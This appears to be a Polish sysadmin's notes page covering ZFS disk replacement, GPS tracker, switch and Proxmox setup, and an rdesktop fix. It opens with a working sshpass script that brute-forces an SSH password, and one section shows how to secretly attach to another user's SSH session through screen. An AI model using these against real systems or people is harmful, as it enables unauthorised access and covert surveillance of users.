Brute force ssh login

apt-get install sshpass

Hasło zawierało 2 cyfry z shiftem oraz 4 stałe znaki

#!/bin/bash
TAB=("!" "@" "#" "$" "%" "^" "&" "*" "(" ")");
for (( i=0; $i <= 9; i++ )) ; do
for (( j=0; $j <= 9; j++ )) ; do
   PSS=${TAB[$i]}${TAB[$j]}"xxxx";
   echo $PSS;
sshpass -p "$PSS" ssh ubnt@10.10.197.77 
done
done

Podmiana dysku zfs proxmox

# zpool list
NAME SIZE ALLOC FREE CKPOINT EXPANDSZ FRAG CAP DEDUP HEALTH ALTROOT
rpool 7.27T 13.0G 7.25T – – 0% 0% 1.00x DEGRADED –
# zpool status -v
pool: rpool
state: DEGRADED
status: One or more devices are faulted in response to persistent errors.
Sufficient replicas exist for the pool to continue functioning in a
degraded state.
action: Replace the faulted device, or use ‚zpool clear’ to mark the device
repaired.
scan: scrub repaired 704K in 0 days 00:07:18 with 0 errors on Sun Mar 8 00:31:47 2020
config:

NAME                        STATE   READ WRITE CKSUM
rpool                        DEGRADED   0   0   0
 raidz1-0                     DEGRADED   0   0   0
  ata-ST2000DM001-1ER164_W4Z0E981-part3      ONLINE    0   0   0
  ata-WDC_WD20EARS-00MVWB0_WD-WCAZA3946000-part3 FAULTED  178   0   0 too many errors
  ata-ST2000DM001-9YN164_Z1E1DQEV-part3      ONLINE    0   0   0
  ata-ST2000DM001-9YN164_W24055XV-part3      ONLINE    0   0   0

Po włożeniu nowego dysku kopiujemy tablicę partycji:

sgdisk --replicate=/dev/sdb /dev/sda

(z sda do sdb)

Randomizujemy UIDy:

# sgdisk --randomize-guids /dev/sdb

#zpool replace rpool ata-WDC_WD20EARS-00MVWB0_WD-WCAZA3946000-part3 sdb3

i już:

zpool status -v

pool: rpool
state: ONLINE
scan: resilvered 2.42G in 0 days 00:01:58 with 0 errors on Wed Mar 18 16:09:50 2020
config:

NAME                    STATE   READ WRITE CKSUM
rpool                   ONLINE    0   0   0
 raidz1-0                 ONLINE    0   0   0
  ata-ST2000DM001-1ER164_W4Z0E981-part3 ONLINE    0   0   0
  sdb3                  ONLINE    0   0   0
  ata-ST2000DM001-9YN164_Z1E1DQEV-part3 ONLINE    0   0   0
  ata-ST2000DM001-9YN164_W24055XV-part3 ONLINE    0   0   0

errors: No known data errors

Na koniec jeszcze (dopiero gdy zakończy się synchronizacja i dysk będzie ONLINE) :

grub-install /dev/sdb

GPS tracker tk103 konfiguracja

Aby zresetować konfigurację:

begin123456

Aby ustawić APN:

APN123456 internet

Podać adres IP i port do wysyłki:

adminip123456 176.121.1.1 5001

Aby ustawić wysyłkę co 30 sekund:

fix030s***n123456

Aby wysyłać do serwera po gprs:

gprs123456

(pas)

Podgląd co ktoś robi przez ssh – korzystając ze screena

Zakładamy, że konto ma ustawiony shell /bin/bash. Aby podczas logowania uruchamiał się screen dodajemy w pliku:

.bash_profile

zawartość:

/usr/bin/screen -l

(opcja -l aby nie pojawiał się komunikaty startowe programu screen)

Teraz po zalogowaniu na konto uruchamia się nowa sesja screena. Po zalogowaniu dwukrotnym, w jednej sesji opuszczamy screen (CTRL-A-D) i na niej listujemy jakie inne screeny są uruchomione:

screen -list
There is a screen on:
18446.pts-1.natalka (11.08.2019 11:28:06) (Attached)
1 Socket in /run/screen/S-fib.

Do takiego screena możemy się podłączyć przez:

screen -x 18446

(jeśli jest tylko jeden to wystarczy screen -x)

dlink DGS-1510-28X firmware upgrade

Przez http wgrać plik z firmware, a potem:

Switch#dir

Directory of /c:
1 -rw 8655864 Jan 01 2000 00:13:59 runtime.had
2 -rw 9962856 Jan 01 2000 00:18:13 1_50_021
3 -rw 22821 Jan 01 2000 00:07:25 config.cfg
4 -rw 9791996 Jan 01 2000 00:31:54 1_60_012
5 d– 0 Jan 01 2000 00:00:08 system

30656000 bytes total (1528832 bytes free)

Switch#configure
Switch#configure terminal
Switch(config)#boot image 1_60_012
Switch(config)#end
Switch#reboot

Are you sure you want to proceed with the system reboot?(y/n)

Zapisanie konfiguracji w tym pliku robi się tak:
Switch#copy running-config startup-config

Destination filename startup-config? [y/n]: y

Saving all configurations to NV-RAM………. Done.

Switch#reboot

Are you sure you want to proceed with the system reboot?(y/n)

Proxmox vnc

Aby dostać się przez dowolnego klienta VNC do konsoli należy nadanej VMce, w zakładce monitor wpisać:

# change vnc 0.0.0.0:100,password

# set_password vnc TAJNEHASLO

Wtedy vncserwer zaczyna słuchać na porcie 5900+100

Jak sprawdzić z jakiego akamai korzysta się?

mtr obrazki.elektroda.pl -c5 -r
HOST: host.amsnet.pl Loss% Snt Last Avg Best Wrst StDev
1.|– ns3.amsnet.pl 0.0% 5 0.2 0.5 0.1 0.9 0.4
2.|– pii.amsnet.pl 0.0% 5 0.4 0.4 0.3 0.5 0.1
3.|– 120.10.48.185.ip4.epix.ne 0.0% 5 3.0 3.2 3.0 3.7 0.3
4.|– akamai.plix.pl 0.0% 5 10.9 11.4 10.8 12.4 0.6
5.|– a23-59-85-138.deploy.stat 0.0% 5 10.4 10.6 10.0 11.5 0.6

windows10 rdesktop ERROR: CredSSP

Do windows 10 nie da się standardowo połączyć rdesktopem z linuksa:

$ rdesktop 172.16.34.99
Autoselected keyboard map pl
ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
Connection established using SSL.

Trzeba wejść w Windows10->System->Panel sterowania->System->Ustawienia zdalne->Zdalny-> i tu wykasować haczyk z ‚Zezwalaj na połączenia tylko z komputerów, na których Pulpit zdalny jest uruchomiony z uwierzytelnianiem na poziomie sieci’